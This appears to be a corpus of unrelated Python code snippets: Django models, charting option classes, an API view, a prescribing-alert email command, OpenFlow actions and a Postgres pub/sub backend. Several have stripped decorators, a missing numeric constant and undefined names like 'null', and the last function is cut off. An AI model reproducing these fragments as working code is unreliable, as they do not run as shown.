phone = models.CharField('Phone Number', max_length=20, blank=True, null=True, help_text=('Optional. Most locations operate primarily by email, but a phone number can be helpful for last ' + 'minute coordination and the unexpected.'))
projects = models.TextField(verbose_name='Current Projects', help_text='Describe one or more projects you are currently working on')
sharing = models.TextField(help_text="Is there anything you'd be interested in learning or sharing during your stay?")
discussion = models.TextField(help_text=("We like discussing thorny issues with each other. What's a question that's been on your mind lately " + "that you don't know the answer to?"))
referral = models.CharField(max_length=200, help_text='How did you hear about us? (Give a name if possible!)')
city = models.CharField(max_length=200, verbose_name='City', help_text='In what city are you primarily based?')
customer_id = models.CharField(max_length=200, blank=True, null=True)
last4 = models.IntegerField(null=True, blank=True, help_text="Last 4 digits of the user's card on file, if any")
primary_accounts = models.ManyToManyField(Account, help_text='one for each currency', related_name='primary_for', blank=True)
def __str__(self):
return str(self.user)
def get_or_create_primary_account(self, currency):
logger.debug('checking for primary account...')
primary = self.primary_accounts.filter(currency=currency).first()
if primary:
logger.debug(('found: %s (id %d)' % (primary, primary.id)))
if (not primary):
primary = Account(currency=currency, name=('%s %s Account (primary)' % (self.user.first_name, currency.name)))
primary.save()
primary.owners.add(self.user)
logger.debug('saving new primary account')
logger.debug(primary.id)
self.primary_accounts.add(primary)
return primary
def _has_primary_drft_account(self):
return self.primary_accounts.filter(currency=Currency.objects.get(name='DRFT')).first()
def primary_drft_account(self):
return self.get_or_create_primary_account(currency=Currency.objects.get(name='DRFT'))
def drft_spending_balance(self):
account = self.get_or_create_primary_account(currency=Currency.objects.get(name='DRFT'))
return account.get_balance()
def accounts(self):
return (list(self.user.accounts_owned.all()) + list(self.user.accounts_administered.all()))
def accounts_in_currency(self, currency):
return (list(self.user.accounts_owned.filter(currency=currency)) + list(self.user.accounts_administered.filter(currency=currency))) |
def build_interpolatable_glyphs(contours, *transforms):
glyph1 = Glyph()
glyph1.numberOfContours = len(contours)
glyph1.coordinates = GlyphCoordinates([pt for contour in contours for (pt, _flag) in contour])
glyph1.flags = array.array('B', [flag for contour in contours for (_pt, flag) in contour])
glyph1.endPtsOfContours = [(sum((len(contour) for contour in contours[:(i + 1)])) - 1) for i in range(len(contours))]
result = [glyph1]
for t in transforms:
glyph = deepcopy(glyph1)
glyph.coordinates.transform((t[0:2], t[2:4]))
glyph.coordinates.translate(t[4:6])
result.append(glyph)
return result |
class AttendeeRegistrationByCollaboratorForm(forms.ModelForm):
class Meta():
model = Attendee
fields = ['first_name', 'last_name', 'nickname', 'email', 'additional_info', 'is_installing', 'event', 'registration_date']
widgets = {'event': forms.HiddenInput(), 'registration_date': forms.HiddenInput(), 'additional_info': forms.TextInput()} |
def extractTheWorldOnTheOtherSide(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol or frag)) or ('preview' in item['title'].lower())):
return None
tagmap = [('Drop!! ~A Tale of the Fragrance Princess~', 'Drop!! ~A Tale of the Fragrance Princess~', 'translated'), ("I'll Live My Second Life!", "I'll Live My Second Life!", 'translated')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
titlemap = [('Second Life! Chapter', "I'll Live My Second Life!", 'translated')]
for (titlecomponent, name, tl_type) in titlemap:
if (titlecomponent.lower() in item['title'].lower()):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class LegalEntityNameGenerator2():
random_state: numpy.random.RandomState
sic = {}
def __init__(self, randomstate):
self.random_state = randomstate
self.namer = CompanyNameMarkov(self.random_state)
def make(self, sic, country_code=None):
config = SIC[sic.code]
return self.create_name(config, country_code)
def make_clienttype(self, client_type, country_code=None):
client_types = CLIENT_TYPES[client_type]
config = self.random_state.choice(client_types)
return self.create_name(config, country_code)
def create_name(self, config, country_code):
while True:
model = config['models'][0]
full_name = self.namer.make(model)
postfixes = config['postfixes']
for group in postfixes:
choice = self.random_state.choice(group)
if (len(choice) > 1):
full_name = full_name.strip()
full_name = ((full_name + ' ') + self.random_state.choice(group))
v = full_name.strip()
if (v not in NAMES):
NAMES.append(v)
if country_code:
suffix = SUFFIC_GENERATOR.make(country_code)
return f'{v} {suffix}'
return v |
class OptionsLayer(OptChart.OptionsChart):
def description(self):
return self._config_get()
def description(self, text):
self._config(text)
def width(self):
return self._config_get()
def width(self, num):
self._config(num)
def height(self):
return self._config_get()
def height(self, num):
self._config(num)
def padding(self):
return self._config_get()
def padding(self, num):
self._config(num)
def autosize(self):
return self._config_get()
def autosize(self, text):
self._config(text)
def data(self):
return self._config_sub_data('data', OptData)
def spec(self):
return self._config_sub_data('spec', OptSpec)
def repeat(self):
return self._config_sub_data('repeat', OptRepeat)
def parent_width(self, percent):
self._config(('%s / 100 * (function(component){return component.clientWidth - (parseFloat(component.style.paddingLeft || 0) + parseFloat(component.style.paddingRight || 0)) })(%s)' % (percent, self.component.dom.varId)), name='width', js_type=True)
def mark(self):
return self._config_get()
def mark(self, value):
self._config(value)
def marks(self):
return EnumMarks(self, 'mark')
def encoding(self):
return self._config_sub_data('encoding', OptEncoding)
def add_projection(self, name):
scale = self._config_sub_data_enum('projection', OptProjection)
scale.name = name
return scale
def add_scale(self, name, range=None):
scale = self._config_sub_data_enum('scales', OptScale)
scale.name = name
if (range is not None):
scale.range = range
return scale
def add_axe(self, scale, orient):
s = self._config_sub_data_enum('axes', OptAxe)
s.scale = scale
s.orient = orient
return s
def add_legend(self, kind, title=None):
s = self._config_sub_data_enum('legends', OptLegend)
s.type = kind
if (title is not None):
s.title = title
return s
def add_signal(self, name, value=None):
s = self._config_sub_data_enum('signals', OptSignal)
s.name = name
s.value = value
return s
def add_mark(self, kind):
s = self._config_sub_data_enum('mark', OptMark)
s.type = kind
return s
def add_layer(self):
s = self._config_sub_data_enum('layer', OptionsLayer)
return s |
class OptionSeriesItem(Options):
def accessibility(self) -> 'OptionSeriesItemAccessibility':
return self._config_sub_data('accessibility', OptionSeriesItemAccessibility)
def allowPointSelect(self):
return self._config_get(False)
def allowPointSelect(self, flag: bool):
self._config(flag, js_type=False)
def animation(self):
return self._config_get(True)
def animation(self, flag: bool):
self._config(flag, js_type=False)
def animationLimit(self):
return self._config_get(None)
def animationLimit(self, num: float):
self._config(num, js_type=False)
def borderRadius(self):
return self._config_get(3)
def borderRadius(self, num: float):
self._config(num, js_type=False)
def center(self):
return self._config_get([null, null])
def center(self, value: Any):
self._config(value, js_type=False)
def className(self):
return self._config_get(None)
def className(self, text: str):
self._config(text, js_type=False)
def clip(self):
return self._config_get(False)
def clip(self, flag: bool):
self._config(flag, js_type=False)
def color(self):
return self._config_get('#cccccc')
def color(self, text: str):
self._config(text, js_type=False)
def colorAxis(self):
return self._config_get(0)
def colorAxis(self, num: float):
self._config(num, js_type=False)
def colorIndex(self):
return self._config_get(None)
def colorIndex(self, num: float):
self._config(num, js_type=False)
def colorKey(self):
return self._config_get('y')
def colorKey(self, text: str):
self._config(text, js_type=False)
def colors(self):
return self._config_get(None)
def colors(self, value: Any):
self._config(value, js_type=False)
def connectEnds(self):
return self._config_get(None)
def connectEnds(self, flag: bool):
self._config(flag, js_type=False)
def connectNulls(self):
return self._config_get(False)
def connectNulls(self, flag: bool):
self._config(flag, js_type=False)
def crisp(self):
return self._config_get(False)
def crisp(self, flag: bool):
self._config(flag, js_type=False)
def cropThreshold(self):
return self._config_get(300)
def cropThreshold(self, num: float):
self._config(num, js_type=False)
def cursor(self):
return self._config_get(None)
def cursor(self, text: str):
self._config(text, js_type=False)
def custom(self):
return self._config_get(None)
def custom(self, value: Any):
self._config(value, js_type=False)
def dashStyle(self):
return self._config_get('Solid')
def dashStyle(self, text: str):
self._config(text, js_type=False)
def data(self) -> 'OptionSeriesItemData':
return self._config_sub_data('data', OptionSeriesItemData)
def dataLabels(self) -> 'OptionSeriesItemDatalabels':
return self._config_sub_data('dataLabels', OptionSeriesItemDatalabels)
def description(self):
return self._config_get(None)
def description(self, text: str):
self._config(text, js_type=False)
def dragDrop(self) -> 'OptionSeriesItemDragdrop':
return self._config_sub_data('dragDrop', OptionSeriesItemDragdrop)
def enableMouseTracking(self):
return self._config_get(True)
def enableMouseTracking(self, flag: bool):
self._config(flag, js_type=False)
def endAngle(self):
return self._config_get('undefined')
def endAngle(self, value: Any):
self._config(value, js_type=False)
def events(self) -> 'OptionSeriesItemEvents':
return self._config_sub_data('events', OptionSeriesItemEvents)
def fillColor(self):
return self._config_get('undefined')
def fillColor(self, text: str):
self._config(text, js_type=False)
def findNearestPointBy(self):
return self._config_get('x')
def findNearestPointBy(self, text: str):
self._config(text, js_type=False)
def getExtremesFromAll(self):
return self._config_get(False)
def getExtremesFromAll(self, flag: bool):
self._config(flag, js_type=False)
def id(self):
return self._config_get(None)
def id(self, text: str):
self._config(text, js_type=False)
def ignoreHiddenPoint(self):
return self._config_get(True)
def ignoreHiddenPoint(self, flag: bool):
self._config(flag, js_type=False)
def inactiveOtherPoints(self):
return self._config_get(True)
def inactiveOtherPoints(self, flag: bool):
self._config(flag, js_type=False)
def includeInDataExport(self):
return self._config_get(None)
def includeInDataExport(self, flag: bool):
self._config(flag, js_type=False)
def index(self):
return self._config_get(None)
def index(self, num: float):
self._config(num, js_type=False)
def innerSize(self):
return self._config_get('40%')
def innerSize(self, text: str):
self._config(text, js_type=False)
def itemPadding(self):
return self._config_get(0.1)
def itemPadding(self, num: float):
self._config(num, js_type=False)
def keys(self):
return self._config_get(None)
def keys(self, value: Any):
self._config(value, js_type=False)
def label(self) -> 'OptionSeriesItemLabel':
return self._config_sub_data('label', OptionSeriesItemLabel)
def layout(self):
return self._config_get('vertical')
def layout(self, text: str):
self._config(text, js_type=False)
def legendIndex(self):
return self._config_get(None)
def legendIndex(self, num: float):
self._config(num, js_type=False)
def legendSymbol(self):
return self._config_get('rectangle')
def legendSymbol(self, text: str):
self._config(text, js_type=False)
def linecap(self):
return self._config_get(round)
def linecap(self, value: Any):
self._config(value, js_type=False)
def lineWidth(self):
return self._config_get(2)
def lineWidth(self, num: float):
self._config(num, js_type=False)
def linkedTo(self):
return self._config_get(None)
def linkedTo(self, text: str):
self._config(text, js_type=False)
def marker(self) -> 'OptionSeriesItemMarker':
return self._config_sub_data('marker', OptionSeriesItemMarker)
def minSize(self):
return self._config_get(80)
def minSize(self, num: float):
self._config(num, js_type=False)
def name(self):
return self._config_get(None)
def name(self, text: str):
self._config(text, js_type=False)
def negativeColor(self):
return self._config_get(None)
def negativeColor(self, text: str):
self._config(text, js_type=False)
def onPoint(self) -> 'OptionSeriesItemOnpoint':
return self._config_sub_data('onPoint', OptionSeriesItemOnpoint)
def opacity(self):
return self._config_get(1)
def opacity(self, num: float):
self._config(num, js_type=False)
def point(self) -> 'OptionSeriesItemPoint':
return self._config_sub_data('point', OptionSeriesItemPoint)
def pointDescriptionFormat(self):
return self._config_get(None)
def pointDescriptionFormat(self, value: Any):
self._config(value, js_type=False)
def pointDescriptionFormatter(self):
return self._config_get(None)
def pointDescriptionFormatter(self, value: Any):
self._config(value, js_type=False)
def pointInterval(self):
return self._config_get(1)
def pointInterval(self, num: float):
self._config(num, js_type=False)
def pointIntervalUnit(self):
return self._config_get(None)
def pointIntervalUnit(self, value: Any):
self._config(value, js_type=False)
def pointPlacement(self):
return self._config_get(None)
def pointPlacement(self, text: str):
self._config(text, js_type=False)
def pointStart(self):
return self._config_get(0)
def pointStart(self, num: float):
self._config(num, js_type=False)
def relativeXValue(self):
return self._config_get(False)
def relativeXValue(self, flag: bool):
self._config(flag, js_type=False)
def rows(self):
return self._config_get('undefined')
def rows(self, num: float):
self._config(num, js_type=False)
def selected(self):
return self._config_get(False)
def selected(self, flag: bool):
self._config(flag, js_type=False)
def shadow(self):
return self._config_get(False)
def shadow(self, flag: bool):
self._config(flag, js_type=False)
def showCheckbox(self):
return self._config_get(False)
def showCheckbox(self, flag: bool):
self._config(flag, js_type=False)
def showInLegend(self):
return self._config_get(True)
def showInLegend(self, flag: bool):
self._config(flag, js_type=False)
def size(self):
return self._config_get(None)
def size(self, num: float):
self._config(num, js_type=False)
def skipKeyboardNavigation(self):
return self._config_get(None)
def skipKeyboardNavigation(self, flag: bool):
self._config(flag, js_type=False)
def softThreshold(self):
return self._config_get(True)
def softThreshold(self, flag: bool):
self._config(flag, js_type=False)
def sonification(self) -> 'OptionSeriesItemSonification':
return self._config_sub_data('sonification', OptionSeriesItemSonification)
def stacking(self):
return self._config_get(None)
def stacking(self, text: str):
self._config(text, js_type=False)
def startAngle(self):
return self._config_get('undefined')
def startAngle(self, value: Any):
self._config(value, js_type=False)
def states(self) -> 'OptionSeriesItemStates':
return self._config_sub_data('states', OptionSeriesItemStates)
def step(self):
return self._config_get(None)
def step(self, value: Any):
self._config(value, js_type=False)
def stickyTracking(self):
return self._config_get(False)
def stickyTracking(self, flag: bool):
self._config(flag, js_type=False)
def thickness(self):
return self._config_get('undefined')
def thickness(self, num: float):
self._config(num, js_type=False)
def threshold(self):
return self._config_get(0)
def threshold(self, num: float):
self._config(num, js_type=False)
def tooltip(self) -> 'OptionSeriesItemTooltip':
return self._config_sub_data('tooltip', OptionSeriesItemTooltip)
def turboThreshold(self):
return self._config_get(1000)
def turboThreshold(self, num: float):
self._config(num, js_type=False)
def type(self):
return self._config_get(None)
def type(self, text: str):
self._config(text, js_type=False)
def visible(self):
return self._config_get(True)
def visible(self, flag: bool):
self._config(flag, js_type=False)
def zIndex(self):
return self._config_get(None)
def zIndex(self, num: float):
self._config(num, js_type=False)
def zoneAxis(self):
return self._config_get('y')
def zoneAxis(self, text: str):
self._config(text, js_type=False)
def zones(self) -> 'OptionSeriesItemZones':
return self._config_sub_data('zones', OptionSeriesItemZones) |
class TASViewSet(APIView):
endpoint_doc = 'usaspending_api/api_contracts/contracts/v2/references/filter_tree/tas.md'
def _parse_and_validate(self, request):
models = [{'key': 'depth', 'name': 'depth', 'type': 'integer', 'allow_nulls': True, 'default': 0, 'optional': True}, {'key': 'filter', 'name': 'filter', 'type': 'text', 'text_type': 'search', 'allow_nulls': True, 'optional': True, 'default': None}]
return TinyShield(models).block(request)
_response()
def get(self, request: Request, tier1: str=None, tier2: str=None, tier3: str=None) -> Response:
request_values = self._parse_and_validate(request.GET)
filter_tree = TASFilterTree()
return Response({'results': filter_tree.search(tier1, tier2, tier3, request_values['depth'], request_values['filter'])}) |
def CoCreateInstanceEx(clsid, interface=None, clsctx=None, machine=None, pServerInfo=None):
if (clsctx is None):
clsctx = (CLSCTX_LOCAL_SERVER | CLSCTX_REMOTE_SERVER)
if (pServerInfo is not None):
if (machine is not None):
msg = 'Can not specify both machine name and server info'
raise ValueError(msg)
elif (machine is not None):
serverinfo = COSERVERINFO()
serverinfo.pwszName = machine
pServerInfo = byref(serverinfo)
if (interface is None):
interface = IUnknown
multiqi = MULTI_QI()
multiqi.pIID = pointer(interface._iid_)
_ole32.CoCreateInstanceEx(byref(clsid), None, clsctx, pServerInfo, 1, byref(multiqi))
return cast(multiqi.pItf, POINTER(interface)) |
class Command(BaseCommand):
args = ''
help = ' Send monthly emails based on bookmarks. With no arguments, sends\n an email to every user for each of their bookmarks, for the\n current month. With arguments, sends a test email to the specified\n user for the specified organisation.'
def add_arguments(self, parser):
parser.add_argument('--recipient-email', help='A single alert recipient to which the batch should be sent')
parser.add_argument('--recipient-email-file', help='The subset of alert recipients to which the batch should be sent. One email per line.')
parser.add_argument('--skip-email-file', help='The subset of alert recipients to which the batch should NOT be sent. One email per line.')
parser.add_argument('--ccg', help='If specified, a CCG code for which a test alert should be sent to `recipient-email`')
parser.add_argument('--pcn', help='If specified, a PCN code for which a test alert should be sent to `recipient-email`')
parser.add_argument('--stp', help='If specified, an STP/ICB code for which a test alert should be sent to `recipient-email`')
parser.add_argument('--practice', help='If specified, a Practice code for which a test alert should be sent to `recipient-email`')
parser.add_argument('--search-name', help='If specified, a name (could be anything) for a test search alert about `url` which should be sent to `recipient-email`')
parser.add_argument('--url', help='If specified, a URL for a test search alert with name `search-name` which should be sent to `recipient-email`')
parser.add_argument('--max_errors', help='Max number of permitted errors before aborting the batch', default=3)
def get_org_bookmarks(self, now_month, **options):
query = ((Q(user__is_active=True) & (~ Q(user__emailmessage__tags__contains=['measures', now_month]))) & (((Q(practice__isnull=False) | Q(pct__isnull=False)) | Q(pcn__isnull=False)) | Q(stp__isnull=False)))
if (options['recipient_email'] and (options['ccg'] or options['practice'] or options['pcn'] or options['stp'])):
dummy_user = User(email=options['recipient_email'], id='dummyid')
dummy_user.profile = Profile(key='dummykey')
bookmarks = [OrgBookmark(user=dummy_user, pct_id=options['ccg'], practice_id=options['practice'], pcn_id=options['pcn'], stp_id=options['stp'])]
logger.info('Created a single test org bookmark')
elif (options['recipient_email'] or options['recipient_email_file']):
recipients = []
if options['recipient_email_file']:
with open(options['recipient_email_file'], 'r') as f:
recipients = [x.strip() for x in f]
else:
recipients = [options['recipient_email']]
query = (query & Q(user__email__in=recipients))
bookmarks = OrgBookmark.objects.filter(query)
logger.info(('Found %s matching org bookmarks' % bookmarks.count()))
else:
bookmarks = OrgBookmark.objects.filter(query)
if options['skip_email_file']:
with open(options['skip_email_file'], 'r') as f:
skip = [x.strip() for x in f]
bookmarks = bookmarks.exclude(user__email__in=skip)
logger.info(('Found %s matching org bookmarks' % bookmarks.count()))
return bookmarks
def get_search_bookmarks(self, now_month, **options):
query = (Q(user__is_active=True) & (~ Q(user__emailmessage__tags__contains=['analyse', now_month])))
if (options['recipient_email'] and options['url']):
dummy_user = User(email=options['recipient_email'], id='dummyid')
dummy_user.profile = Profile(key='dummykey')
bookmarks = [SearchBookmark(user=dummy_user, url=options['url'], name=options['search_name'])]
logger.info('Created a single test search bookmark')
elif (not options['recipient_email']):
bookmarks = SearchBookmark.objects.filter(query)
logger.info(('Found %s matching search bookmarks' % bookmarks.count()))
else:
query = (query & Q(user__email=options['recipient_email']))
bookmarks = SearchBookmark.objects.filter(query)
logger.info(('Found %s matching search bookmarks' % bookmarks.count()))
return bookmarks
def validate_options(self, **options):
if ((options['url'] or options['ccg'] or options['practice']) and (not options['recipient_email'])):
raise CommandError('You must specify a test recipient email if you want to specify a test CCG, practice, or URL')
if (options['url'] and (options['practice'] or options['ccg'])):
raise CommandError('You must specify either a URL, or one of a ccg or a practice')
def send_org_bookmark_email(self, org_bookmark, now_month, options):
if (org_bookmark.practice or options['practice']):
org = (org_bookmark.practice or Practice.objects.get(pk=options['practice']))
elif (org_bookmark.pct or options['ccg']):
org = (org_bookmark.pct or PCT.objects.get(pk=options['ccg']))
elif (org_bookmark.pcn or options['pcn']):
org = (org_bookmark.pcn or PCN.objects.get(pk=options['pcn']))
elif (org_bookmark.stp or options['stp']):
org = (org_bookmark.stp or STP.objects.get(pk=options['stp']))
else:
assert False
if getattr(org, 'close_date', None):
logger.info('Skipping sending alert for closed org %s', org.pk)
return
stats = bookmark_utils.InterestingMeasureFinder(org).context_for_org_email()
try:
msg = bookmark_utils.make_org_email(org_bookmark, stats, tag=now_month)
msg = EmailMessage.objects.create_from_message(msg)
msg.send()
logger.info(('Sent org bookmark alert to %s about %s' % (msg.to, org_bookmark.id)))
except bookmark_utils.BadAlertImageError as e:
logger.exception(e)
def send_search_bookmark_email(self, search_bookmark, now_month):
try:
recipient_id = search_bookmark.user.id
msg = bookmark_utils.make_search_email(search_bookmark, tag=now_month)
msg = EmailMessage.objects.create_from_message(msg)
msg.send()
logger.info(('Sent search bookmark alert to %s about %s' % (recipient_id, search_bookmark.id)))
except bookmark_utils.BadAlertImageError as e:
logger.exception(e)
def send_all_england_alerts(self, options):
set_options = {k: v for (k, v) in options.items() if (v is not None)}
for key in ['pythonpath', 'verbosity', 'traceback', 'settings', 'no_color', 'force_color', 'max_errors', 'skip_checks']:
set_options.pop(key, None)
recipient_email = set_options.pop('recipient_email', None)
if (not set_options):
message = 'Sending All England alerts'
logger.info(message)
print(message)
send_all_england_alerts(recipient_email)
else:
message = 'Not sending All England alerts as found unhandled option: {}'.format(', '.join(set_options.keys()))
logger.info(message)
print(message)
def handle(self, *args, **options):
self.validate_options(**options)
now_month = ImportLog.objects.latest_in_category('prescribing').current_at.strftime('%Y-%m-%d').lower()
self.send_all_england_alerts(options)
with EmailErrorDeferrer(int(options['max_errors'])) as error_deferrer:
for org_bookmark in self.get_org_bookmarks(now_month, **options):
error_deferrer.try_email(self.send_org_bookmark_email, org_bookmark, now_month, options)
for search_bookmark in self.get_search_bookmarks(now_month, **options):
error_deferrer.try_email(self.send_search_bookmark_email, search_bookmark, now_month) |
class OptionPlotoptionsArearangeSonificationDefaultspeechoptionsMappingTime(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
_exception
def vm_node_overlays_sync(sender, vm=None, old_json_active=None, **kwargs):
assert vm
vm_nics = vm.json_active_get_nics()
if old_json_active:
vm_nics += vm.get_nics(old_json_active)
vm_overlay_rules = filter(None, {_is_vm_nic_over_overlay(vm_nic) for vm_nic in vm_nics})
if (not vm_overlay_rules):
logger.debug('Skipping node overlay sync signaled by "%s" because VM %s does not have nics on overlays', sender, vm)
return
return node_overlays_sync(sender, node=vm.node, overlay_rules=vm_overlay_rules, **kwargs) |
('foremast.utils.subnets.gate_request')
def test_utils_subnets_get_subnets_subnet_not_found(mock_gate_request):
mock_gate_request.return_value.json.return_value = SUBNET_DATA
with pytest.raises(SpinnakerSubnetError):
result = get_subnets(env='dev', region='us-west-1')
assert (result == {'us-west-1': [[]]}) |
(scope='function')
def iter_block_number(start=0):
def iterator():
block_number = start
while True:
sent_value = (yield block_number)
if (sent_value is not None):
block_number = sent_value
block_number = iterator()
next(block_number)
return block_number |
_action('test_service', 'test_action_2', body={'major': 'response'})
((__name__ + '._test_function'), return_value=42)
class TestStubActionAsStubAndPatchDecoratedClassUnitTestCase(UnitTestServerTestCase):
server_class = _TestServiceServer
server_settings = {}
def test_works_as_expected(self, mock_randint, stub_test_action_2):
response = self.client.call_action('test_service', 'test_action_1')
self.assertEqual({'value': 42}, response.body)
response = self.client.call_action('test_service', 'test_action_2', {'minor': 'request'})
self.assertEqual({'major': 'response'}, response.body)
self.assertEqual(1, stub_test_action_2.call_count)
self.assertEqual({'minor': 'request'}, stub_test_action_2.call_body)
stub_test_action_2.assert_called_once_with({'minor': 'request'})
mock_randint.assert_called_once_with(0, 99)
_action('cow', 'moo', body={'eats': 'grass'})
def test_works_with_yet_another_stub(self, stub_moo, mock_randint, stub_test_action_2):
response = self.client.call_action('test_service', 'test_action_1')
self.assertEqual({'value': 42}, response.body)
response = self.client.call_action('test_service', 'test_action_2', {'minor': 'request'})
self.assertEqual({'major': 'response'}, response.body)
response = self.client.call_action('cow', 'moo')
self.assertEqual({'eats': 'grass'}, response.body)
self.assertEqual(1, stub_test_action_2.call_count)
self.assertEqual({'minor': 'request'}, stub_test_action_2.call_body)
stub_test_action_2.assert_called_once_with({'minor': 'request'})
self.assertEqual(1, stub_moo.call_count)
self.assertEqual({}, stub_moo.call_body)
stub_moo.assert_called_once_with({})
mock_randint.assert_called_once_with(0, 99) |
class OptionPlotoptionsBoxplotSonificationDefaultinstrumentoptionsMappingTremoloSpeed(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class Message():
def ok(title, message, icon):
msgBox = QtWidgets.QMessageBox()
msgBox.setWindowFlags((msgBox.windowFlags() | QtCore.Qt.WindowStaysOnTopHint))
msgBox.setText('<b>{0}</b><br><br>{1}'.format(title, message))
msgBox.setIcon(icon)
msgBox.setModal(True)
msgBox.setStandardButtons(QtWidgets.QMessageBox.Ok)
msgBox.exec_()
def yes_no(title, message, icon):
msgBox = QtWidgets.QMessageBox()
msgBox.setWindowFlags((msgBox.windowFlags() | QtCore.Qt.WindowStaysOnTopHint))
msgBox.setText(title)
msgBox.setIcon(icon)
msgBox.setModal(True)
msgBox.setInformativeText(message)
msgBox.setStandardButtons((QtWidgets.QMessageBox.Cancel | QtWidgets.QMessageBox.Yes))
msgBox.setDefaultButton(QtWidgets.QMessageBox.Cancel)
return msgBox.exec_() |
class NodeLookup(object):
def __init__(self):
self.nodes = {}
def load_from_nodes(self, nodes):
self.nodes = nodes
def load_from_root_csv(self, nodes):
import pyjson5 as json5
import progressbar
for node in progressbar.progressbar(nodes):
with OpenSafeFile(node) as f:
node_wires = json5.load(f)
assert (node_wires['node'] not in self.nodes)
self.nodes[node_wires['node']] = node_wires['wires']
def load_from_file(self, fname):
with OpenSafeFile(fname, 'rb') as f:
self.nodes = pickle.load(f)
def save_to_file(self, fname):
with OpenSafeFile(fname, 'wb') as f:
pickle.dump(self.nodes, f)
def site_pin_node_to_wires(self, tile, node):
if (node is None):
return
node_wires = self.nodes[node]
for wire in node_wires:
if wire['wire'].startswith((tile + '/')):
(yield wire['wire'][(len(tile) + 1):])
def wires_for_tile(self, tile):
for node in self.nodes.values():
for wire in node:
if wire['wire'].startswith((tile + '/')):
(yield wire['wire'][(len(tile) + 1):]) |
class PostgresBackend(BroadcastBackend):
def __init__(self, url: str):
self._url = url
async def connect(self) -> None:
self._conn = (await asyncpg.connect(self._url))
self._listen_queue: asyncio.Queue = asyncio.Queue()
async def disconnect(self) -> None:
(await self._conn.close())
async def subscribe(self, channel: str) -> None:
(await self._conn.add_listener(channel, self._listener))
async def unsubscribe(self, channel: str) -> None:
(await self._conn.remove_listener(channel, self._listener))
async def publish(self, channel: str, message: str) -> None:
(await self._conn.execute('SELECT pg_notify($1, $2);', channel, message))
def _listener(self, *args: Any) -> None:
(connection, pid, channel, payload) = args
event = Event(channel=channel, message=payload)
self._listen_queue.put_nowait(event)
async def next_published(self) -> Event:
return (await self._listen_queue.get()) |
_action_type(ofproto.OFPAT_SET_FIELD, ofproto.OFP_ACTION_SET_FIELD_SIZE)
class OFPActionSetField(OFPAction):
def __init__(self, field=None, **kwargs):
super(OFPActionSetField, self).__init__()
if isinstance(field, OFPMatchField):
assert (len(kwargs) == 0)
self.field = field
else:
assert (len(kwargs) == 1)
key = list(kwargs.keys())[0]
value = kwargs[key]
assert isinstance(key, (str, six.text_type))
assert (not isinstance(value, tuple))
self.key = key
self.value = value
def parser(cls, buf, offset):
(type_, len_) = struct.unpack_from(ofproto.OFP_ACTION_SET_FIELD_PACK_STR, buf, offset)
(n, value, mask, _len) = ofproto.oxm_parse(buf, (offset + 4))
(k, uv) = ofproto.oxm_to_user(n, value, mask)
action = cls(**{k: uv})
action.len = len_
action.field = OFPMatchField.parser(buf, (offset + 4))
return action
def serialize(self, buf, offset):
if self._composed_with_old_api():
return self.serialize_old(buf, offset)
(n, value, mask) = ofproto.oxm_from_user(self.key, self.value)
len_ = ofproto.oxm_serialize(n, value, mask, buf, (offset + 4))
self.len = utils.round_up((4 + len_), 8)
msg_pack_into('!HH', buf, offset, self.type, self.len)
pad_len = (self.len - (4 + len_))
msg_pack_into(('%dx' % pad_len), buf, ((offset + 4) + len_))
def serialize_old(self, buf, offset):
len_ = (ofproto.OFP_ACTION_SET_FIELD_SIZE + self.field.oxm_len())
self.len = utils.round_up(len_, 8)
pad_len = (self.len - len_)
msg_pack_into('!HH', buf, offset, self.type, self.len)
self.field.serialize(buf, (offset + 4))
offset += len_
msg_pack_into(('%dx' % pad_len), buf, offset)
def _composed_with_old_api(self):
return (not hasattr(self, 'value'))
def to_jsondict(self):
return {self.__class__.__name__: {'field': ofproto.oxm_to_jsondict(self.key, self.value), 'len': self.len, 'type': self.type}}
def from_jsondict(cls, dict_):
(k, v) = ofproto.oxm_from_jsondict(dict_['field'])
o = OFPActionSetField(**{k: v})
buf = bytearray()
o.serialize(buf, 0)
return OFPActionSetField.parser(six.binary_type(buf), 0)
def __str__(self):
if self._composed_with_old_api():
o2 = OFPActionSetField(self.field)
buf = bytearray()
o2.serialize(buf, 0)
o = OFPActionSetField.parser(six.binary_type(buf), 0)
else:
o = self
return super(OFPActionSetField, o).__str__()
__repr__ = __str__
def stringify_attrs(self):
(yield (self.key, self.value)) |
class OptionSeriesItemSonificationDefaultinstrumentoptionsMappingFrequency(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def diag_quadrupole3d_40(ax, da, A, bx, db, B, R):
result = numpy.zeros((3, 15, 1), dtype=float)
x0 = (0.5 / (ax + bx))
x1 = ((ax + bx) ** (- 1.0))
x2 = ((- x1) * ((ax * A[0]) + (bx * B[0])))
x3 = ((- x2) - A[0])
x4 = ((ax * bx) * x1)
x5 = numpy.exp(((- x4) * ((A[0] - B[0]) ** 2)))
x6 = (1. * numpy.sqrt(x1))
x7 = (x5 * x6)
x8 = ((x3 ** 2) * x7)
x9 = (x0 * x7)
